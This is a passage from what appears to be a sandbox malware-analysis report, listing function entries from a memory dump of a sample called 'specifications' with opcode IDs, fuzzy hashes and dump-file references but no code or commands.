                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                                                                                  • Instruction ID: 450e40e1e933c6ab85885c26323809b59b61bcb7544e244e00d3c220a47d7fcc
                                                                                                                                                                                  • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                                                                                  • Instruction Fuzzy Hash: A8E0D832344145ABD7222A598840BEA77E5DBD47A0F150429E282CB352DB70DD40D7DC
                                                                                                                                                                                  Function 01154164 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 4568ba849d05eea4e02355b9a2ad52544224e73982bf42af0134886011471fff
                                                                                                                                                                                  • Instruction ID: bd07bc26535e982d1bf5d2a3f08452df45e40a2dfb38b93661316abd570eca9b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4568ba849d05eea4e02355b9a2ad52544224e73982bf42af0134886011471fff
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4FF0A035A25591CFE7FAD728D180B5277E0AB10630F0A0554D86087D12E334ECC0C650
                                                                                                                                                                                  Function 0112678E Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                                                                                  • Instruction ID: 1a9dcf5d5d9cffc46d59b4e93735b7b970e9e5e312c6b322079cfdf1add6b7a3
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 06E0DF32A00520BBDF26A7998D01FDABEACDB94FA0F050065FA01E70D4E630DE00D690
                                                                                                                                                                                  Function 011508C0 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                                                                                                  • Instruction ID: 724eed4ce0e69f651ae3551b31332a672e27802c804a66c9b9bad260949a7074
                                                                                                                                                                                  • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                                                                                                  • Instruction Fuzzy Hash: D5E09B31A40350DBCB698A5DC140F53B7E8DF99764F15806DEE3547612C331F842C6D0
                                                                                                                                                                                  Function 010825E0 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 76c6c02363ecdd46bf326603a8921956f26bd1268785f1eec154012edb5d7b1a
                                                                                                                                                                                  • Instruction ID: 5adf7d669d25d98d20f7fe9e99324255000d60307b49fed8c2e79a7cd6230508
                                                                                                                                                                                  • Opcode Fuzzy Hash: 76c6c02363ecdd46bf326603a8921956f26bd1268785f1eec154012edb5d7b1a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7BE092721009949BC725BB29DD01FCA7BAAEB64764F014529B19597190CA30A950CB84
                                                                                                                                                                                  Function 0113A456 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                                                                                  • Instruction ID: b59b872e0bbb37beb7ab1e1afd312aa1723ff3e2db7ac95f58008eb7266e2dd9
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0AE09231010A51DFE73A6F2AD958B92BAE0BF90711F188C2CA0DA424B0C77598C0CA40
                                                                                                                                                                                  Function 01104000 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                                                                  • Instruction ID: 89cfefa9f960197d98f714bc3b0b901a160b8b7ae0f15ca7b892f573ef75bd89
                                                                                                                                                                                  • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 78E0C9347003058FE715CF19C080B927BB6BFD5610F28C068A9488F649EB72E842CB40
                                                                                                                                                                                  Function 0107823B Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                                                                                  • Instruction ID: 6458ae04a6b702055a2143919cb08ab2912c8ee193ce826a591136033011747f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                                                                                  • Instruction Fuzzy Hash: 73E08C31900A54EEDB322F26DC04B9976A1FB54B11F11886AE0CA0A8A48A70AC82DF48
                                                                                                                                                                                  Function 01082050 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: f0ba260107d366da611866c9488d7141de65dd43c98f868e50dc302ba4010b53
                                                                                                                                                                                  • Instruction ID: 1c7859dfa3a5cd826b463a7365f17a89bf003bf67324a14ee3e345889376b68d
                                                                                                                                                                                  • Opcode Fuzzy Hash: f0ba260107d366da611866c9488d7141de65dd43c98f868e50dc302ba4010b53
                                                                                                                                                                                  • Instruction Fuzzy Hash: D7E0C232100894ABC721FB6DDD10F8A77AEEFA4260F000121F1D4CB290CA20AD40C794
                                                                                                                                                                                  Function 010B8A90 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                                                                                                  • Instruction ID: 84cfd6f85015ffcccb186f46f53dbcdadbbf0b0b6a7ebc12e0a59b2c27a7d613
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                                                                                                  • Instruction Fuzzy Hash: BEE08633115A1487D728EE18D551BB677E8EF45720F09863EA65347790C534E544CB94
                                                                                                                                                                                  Function 010BE59C Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                                                                  • Instruction ID: 76b7b4a3bdec600b486d17adc31fbe9e639678fd8716cfb4ea06fb82d7000f34
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                                                                  • Instruction Fuzzy Hash: AFD0A932204A64ABDBB2AA2CFC00FC333E8BB88720F060499B048CB051C360AC81CA84
                                                                                                                                                                                  Function 010FE908 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                                                                  • Instruction ID: d724d9fffd761ed11c3e9d9ef0538d556944bef641c12b00e4558159d1b0089f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2CE0EC75954684AFDF52EF59C640F9EBBF9BB95B40F150058A2885B670C624A900CB50
                                                                                                                                                                                  Function 0107A0E3 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                                                                  • Instruction ID: 490a79f71bb84d1c0a54657ea538ddd5b4d642561c3c027ab697eb8b82800c0d
                                                                                                                                                                                  • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                                                                  • Instruction Fuzzy Hash: 91D02232713070D7DF2956656810FAB6905AB80A90F0E006C340AD3800C0048C83D6E0
                                                                                                                                                                                  Function 010BA830 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                                                                  • Instruction ID: 5c4ba68155f7b1a398a405a496c873d9d9e786e28e8585071ed07b3262730832
                                                                                                                                                                                  • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 24D012771D054DBBCB119F66DC01F957BA9E764BA0F444020B508CB5A0C63AE950DA84
                                                                                                                                                                                  Function 010BCA24 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: cac98828292792e482f98f0bc37f585558dc58825c7c87b23cf95958ae23485e
                                                                                                                                                                                  • Instruction ID: 4e26c49ad70f26764f883365c69a60898a599845d3284b074dd3b3409fb3be92
                                                                                                                                                                                  • Opcode Fuzzy Hash: cac98828292792e482f98f0bc37f585558dc58825c7c87b23cf95958ae23485e
                                                                                                                                                                                  • Instruction Fuzzy Hash: B0D0A930601886CBEF2BCF18CA65EEE3AB0FB50640B8000BCE78092920E329EC41CB00
                                                                                                                                                                                  Function 010902A0 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                                                                  • Instruction ID: 94632f2ed0829f50663fc9096ad14bcf75ce18d7547a77d1400a6f9ea069344b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                                                                  • Instruction Fuzzy Hash: 12D09235212A80CFDB5A8B0DC5A4B1533E8BB44B44F8104D0E482CBB66D628D980DA00
                                                                                                                                                                                  Function 010BC700 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                                                                  • Instruction ID: a1985ea5c0d57be430d91f5139e41928eb4648fe1ca8925920bfff9398589c5e
                                                                                                                                                                                  • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                                                                  • Instruction Fuzzy Hash: FAC01232150648AFC7119A95CD01F4177A9E798B40F000021F2048B570C531E810EA44
                                                                                                                                                                                  Function 010A0310 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                                                  • Instruction ID: 16dd6114044ad26a714ad8234e7409a4cfa9bbbca9be4388123f7b875a13565e
                                                                                                                                                                                  • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2ED0123710024CEFCB01DF81C890D9A772AFBD8710F508019FD190B610CA31ED62DA50
                                                                                                                                                                                  Function 01080750 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                                                                  • Instruction ID: 1ea1778e9b96d20009e40dfcb960291ce7e0b7502d600522673fa3cd392739f3
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                                                                  • Instruction Fuzzy Hash: 43C04C75701A458FCF15DB29D2A4F4577E4F744740F1518D0E945CF721E624E801DA10
                                                                                                                                                                                  Function 010C4340 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 2cfe9f98633521cb04237dc7a34a87c7a369b52c89a923c0741f835a12128853
                                                                                                                                                                                  • Instruction ID: ed5a516fa6b38b7f2f1d80e13d65822a27558f884b6d789d2e74400fe52d2c97
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2cfe9f98633521cb04237dc7a34a87c7a369b52c89a923c0741f835a12128853
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8690023560591012A140715C88845464015A7E0301B55C012E0824554CCA148A565362
                                                                                                                                                                                  Function 010C4650 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: afc980b3b0bd713822c0f40b15fdcbed85530554c5deb1e31f024653e464be14
                                                                                                                                                                                  • Instruction ID: b50b7bbfca148bafb12487d1d1b6c65ebec9e1a8ee3b04032b9aafd3d8ad8af1
                                                                                                                                                                                  • Opcode Fuzzy Hash: afc980b3b0bd713822c0f40b15fdcbed85530554c5deb1e31f024653e464be14
                                                                                                                                                                                  • Instruction Fuzzy Hash: 45900265601610425140715C88044066015A7E1301395C116E0954560CC6188955936A
                                                                                                                                                                                  Function 010C2B80 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: aa736e05d71b532488073c1d8e7eb637f40b800e98f0c9c4519815564e54a9f8
                                                                                                                                                                                  • Instruction ID: ac004e06c9c71e36a80ae1afa386c36438b5bf6d980b0c3168367c7900d40e11
                                                                                                                                                                                  • Opcode Fuzzy Hash: aa736e05d71b532488073c1d8e7eb637f40b800e98f0c9c4519815564e54a9f8
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3490023520151802E104715C8804686001597D0301F55C012E6424655ED66589917232
                                                                                                                                                                                  Function 010C2BA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: bd091f055c858667016e2a0a40fc1f957963f2f33b6de58c29eb285ba98b1b4a
                                                                                                                                                                                  • Instruction ID: 66baa0988b91f88bae7567c4a065ba0ca8ace8b7a238814669fc1d18d5efbc5a
                                                                                                                                                                                  • Opcode Fuzzy Hash: bd091f055c858667016e2a0a40fc1f957963f2f33b6de58c29eb285ba98b1b4a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1390023560551802E150715C8414746001597D0301F55C012E0424654DC7558B5577A2
                                                                                                                                                                                  Function 010C2BE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: b42778062a81e522a321209be3c14306084f86a0049105c92e2f13f290d0fef4
                                                                                                                                                                                  • Instruction ID: 7b6de717d04d578439c8de3000176107b49d1e69da826d01f98aa7a10c0c4ff8
                                                                                                                                                                                  • Opcode Fuzzy Hash: b42778062a81e522a321209be3c14306084f86a0049105c92e2f13f290d0fef4
                                                                                                                                                                                  • Instruction Fuzzy Hash: BB90023520555842E140715C8404A46002597D0305F55C012E0464694DD6258E55B762
                                                                                                                                                                                  Function 010C2BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 190576c7258472dc8d2d91b080da80d7395272e162186a25e7c8e3f6933002b9
                                                                                                                                                                                  • Instruction ID: c066160ec28f5beb0148435097454f2a55734d6d649a9c50b8d031d6b0a14ff6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 190576c7258472dc8d2d91b080da80d7395272e162186a25e7c8e3f6933002b9
                                                                                                                                                                                  • Instruction Fuzzy Hash: E690023520151802E180715C840464A001597D1301F95C016E0425654DCA158B5977A2
                                                                                                                                                                                  Function 010C2AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 482c097b452e64ef4ef878ff03e8b4a3f6e8a88e2094564eafb24fa1f250745a
                                                                                                                                                                                  • Instruction ID: 5df8430bafc2a96321f66e6d40a622b5b92e571b16583fdc0f3f62be33814369
                                                                                                                                                                                  • Opcode Fuzzy Hash: 482c097b452e64ef4ef878ff03e8b4a3f6e8a88e2094564eafb24fa1f250745a
                                                                                                                                                                                  • Instruction Fuzzy Hash: F89002A5201650925500B25CC404B0A451597E0201B55C017E1454560CC52589519236
                                                                                                                                                                                  Function 010C2AD0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: c49ced34569e5a6b3f465c865f98b69ffcd850838b22fce6eb54b721f955139e
                                                                                                                                                                                  • Instruction ID: 9ff5462fbf18240dcec5d2caf507bd818b7d71cfb6c30bd12f46db22c72a8dd0
